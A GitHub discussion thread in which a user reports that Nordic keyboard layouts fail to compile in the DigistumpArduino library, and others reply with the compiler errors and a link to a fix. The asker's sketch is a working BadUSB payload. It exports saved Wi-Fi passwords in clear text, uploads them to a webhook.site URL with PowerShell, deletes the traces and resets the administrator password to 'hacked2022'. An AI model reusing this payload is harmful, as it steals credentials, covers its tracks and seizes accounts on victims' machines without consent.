### DISCUSSION TITLE
Issue with keylayouts.h

### DISCUSSION THREAD

**Discussion by ArikSquad** [ArminJo/DigistumpArduino#37] [Q&A] [answered]
Hey, this doesn't work for me.
![image](https://user-images.githubusercontent.com/75741608/160169172-12078b6a-8b73-4934-93bd-f5b1fba5cf69.png)
![image](https://user-images.githubusercontent.com/75741608/160169642-5c7e882b-352b-4826-ace9-84920bf042eb.png)
none of this works...

my code: 
```
#define LAYOUT_FINNISH
#include "DigiKeyboard.h"

void setup() {

}

void loop() {
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
  DigiKeyboard.sendKeyStroke(KEY_R, MODIFIERKEY_LEFT_GUI); //run
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  //keylayouts.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  //keylayouts.sendKeyStroke(KEY_M); //goto Move
  //for(int i =0; i < 100; i++)
    //{
      //keylayouts.sendKeyStroke(KEY_DOWN);
    //}
  //keylayouts.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("cd %temp%"); //going to temporary dir
  DigiKeyboard.delay(500);
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.delay(500);
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/0e47a039-257e-4652-9d24-asd> -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("del Wi-* /s /f /q"); //cleaning up all the mess
  DigiKeyboard.delay(100);
  DigiKeyboard.println("net user administrator *");
  DigiKeyboard.delay(100);
  DigiKeyboard.println("hacked2022");
  DigiKeyboard.delay(100);
  DigiKeyboard.println("hacked2022");
  DigiKeyboard.delay(100);
  //DigiKeyboard.println("exit");
  //DigiKeyboard.delay(100);
  
  
  digitalWrite(1, HIGH);
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
}
```

**Comment by jonathanothen** [comment]
Same for Swedish, Danish and all other nordic languages. I'm no pro by any means but i think we're missing out some setting in the unsigned bits.

Are you getting something like:

In file included from C:\Users\Jonathan Othén\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.7.5\libraries\DigisparkKeyboard/DigiKeyboard.h:17:0,
                 from C:\Users\Jonathan Othén\Documents\Arduino\Rickroll\Rickroll.ino:28:
C:\Users\Jonathan Othén\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.7.5\libraries\DigisparkKeyboard/keylayouts.h:5366:1: error: narrowing conversion of '1024' from 'int' to 'uint8_t {aka unsigned char}' inside { } [-Wnarrowing]
 };
 ^
C:\Users\Jonathan Othén\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.7.5\libraries\DigisparkKeyboard/keylayouts.h:5366:1: error: narrowing conversion of '1792' from 'int' to 'uint8_t {aka unsigned char}' inside { } [-Wnarrowing]
C:\Users\Jonathan Othén\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.7.5\libraries\DigisparkKeyboard/keylayouts.h:5366:1: error: narrowing conversion of '3072' from 'int' to 'uint8_t {aka unsigned char}' inside { } [-Wnarrowing]

**Comment by jonathanothen** [comment, marked as answer]
This post seems to do the trick:

https://github.com/ArminJo/DigistumpArduino/discussions/33

**Reply by ArminJo** [reply]
It is also fixed in the repo, but still not released (6/22).
